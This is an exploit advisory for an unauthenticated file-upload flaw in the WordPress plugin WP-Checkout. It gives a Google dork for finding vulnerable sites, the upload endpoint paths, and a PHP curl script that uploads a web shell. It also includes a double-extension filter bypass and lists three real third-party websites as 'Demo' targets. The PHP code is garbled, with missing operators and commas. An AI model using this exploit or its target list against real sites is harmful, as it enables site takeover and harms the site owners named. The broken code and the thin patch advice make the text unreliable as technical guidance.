facebook facebook twitter rss

Wordpress Plugin WP-CHECKOUT File Upload vulnerability

Author: TUNISIAN CYBER , Published: 12-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Wordpress Plugin WP-CHECKOUT File Upload vulnerability
[+] Date: 12-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"/wp-content/plugins/wp-checkout/vendors/"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com

########################################################################################
+Exploit:
Worpdress's plugin WP-Checkout suffers from a File Upload vulnerability.
+P.O.C:
127.0.0.1/[PATH]//wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
127.0.0.1/[PATH]//wp-content/plugins/wp-checkout/vendors/uploadify/upload.php

<?php 
echo "=============================================== \n";  
echo 
"   WP CHECKOUT File Upload Vulenraiblity   \n";  
echo 
"                 TUNISIAN CYBER   \n";  
echo 
"=============================================== \n\n";  
$uploadfile="3v!L.php"
$ch curl_init("site.ltd/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php"); 
curl_setopt($chCURLOPT_POSTtrue); 
curl_setopt($chCURLOPT_POSTFIELDS
       array(
'imgFile'=>"@$uploadfile")); 
curl_setopt($chCURLOPT_RETURNTRANSFER1); 
$postResult curl_exec($ch); 
curl_close($ch); 
print 
"$postResult"
   
?>


Shell path:
site.ltd/wp-content/upload/uploadify/$postResult cotent
PS: in some cases for the ajaxupload you should use duble ext (.php.jpg)
Demo:
http://christinabodyfit.com/blog/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
https://www.wetumpka-paintball.com/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php

Patch:
Enable Mod_Security.

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :